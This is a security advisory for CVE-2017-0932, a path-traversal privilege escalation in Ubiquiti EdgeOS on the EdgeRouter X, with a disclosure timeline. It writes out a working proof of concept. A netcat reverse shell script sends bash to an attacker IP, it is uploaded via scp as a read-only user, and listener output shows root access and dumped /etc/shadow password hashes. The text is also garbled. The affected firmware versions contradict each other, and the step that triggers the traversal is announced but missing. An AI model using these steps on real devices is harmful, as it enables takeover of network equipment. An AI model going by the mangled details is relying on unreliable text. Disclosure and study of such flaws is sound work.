UBNT EdgeOS version 126.96.36.199 and prior, consequence of the lack of validation on the input of the Feature functionality, an attacker with access to an operator (read-only) account and ssh connection to the devices, can escalate privileges to admin (root) access in the system.
- Vendor: Ubiquiti Networks
- Device: Edger Router X
- Affected Version: 188.8.131.52 and prior
- CVE-ID: CVE-2017-0932
The EdgeOS (firmware v184.108.40.206) is susceptible to a local privilege escalation due a Path Traversal vulnerability in the Feature API. This vulnerability allows an attacker with non-privileged access (read-only) to execute commands on the device with the root rights. The attack consists in sending a maliciously crafted file (using scp with a non-privileged account) to the device and then calling the vulnerable API exploiting the Path Traversal. The exploitation will result on the crafted file being executed with root permission, giving the attacker full access to the device.
First of all, we have to create the following file+directory:
$ cat Backdoor/wizard-run #!/bin/bash /usr/bin/nc 192.168.2.2:1337 -e /bin/bash &
Using a non-privileged ‘operator’ user, it was possible to upload the file to the device using the scp command:
$ scp -r Backdoor firstname.lastname@example.org:~ Welcome to EdgeOS By logging in, accessing, or using the Ubiquiti product, you acknowledge that you have read and understood the Ubiquiti License Agreement (available in the Web UI at, by default, http://192.168.1.1) and agree to be bound by its terms. email@example.com's password: wizard-run
After that, using a valid operator session and a path traversal vulnerability, it was possible to call the uploaded file with root privilege:
And a remote shell will be created:
$ nc -lvp 1337 Listening on [0.0.0.0] (family 0, port 1337) Connection from 192.168.2.1 44440 received! id uid=0(root) gid=102(vyattacfg) uname -a Linux ubnt 3.10.14-UBNT #1 SMP Sat Apr 22 06:38:07 PDT 2017 mips GNU/Linux cat /etc/shadow root:!:17283:0:99999:7::: daemon:*:17283:0:99999:7::: bin:*:17283:0:99999:7::: games:*:17283:0:99999:7::: .. snip snip .. avahi:*:17283:0:99999:7::: sshd:*:17283:0:99999:7::: tss:*:17283:0:99999:7::: ubnt:$1$zKNoUbAo$gomzUbYvgyUMcD436Wo66.:16436:0:99999:7::: operator:$6$7SVNi.WB68V0QR5t$efMoCyT2H.mEU6M8s2NDSsW1fv7JnT2eAfK2VxuzsIdcYrEvWCILX8G0CYN/4enwrnT1yYjekQa95TxxHxhVj.:16436:0:99999:7:::
Upgrade the firmware to the latest available version.
- 2017-06-14 - Vulnerability discovered and first report to Ubiquiti Networks
- 2017-06-14 - UBNT anwsered and confirmed the vulnerability
- 2017-06-14 - Ubiquiti Networks rewarded with a $1,500 bounty
- 2017-08-30 - Ubiquiti Networks fixed the vulnerability
- 2017-11-24 - Ubiquiti Networks agreed with a partial disclosure of the vulnerability
- 2018-03-05 - Disclosure of technical details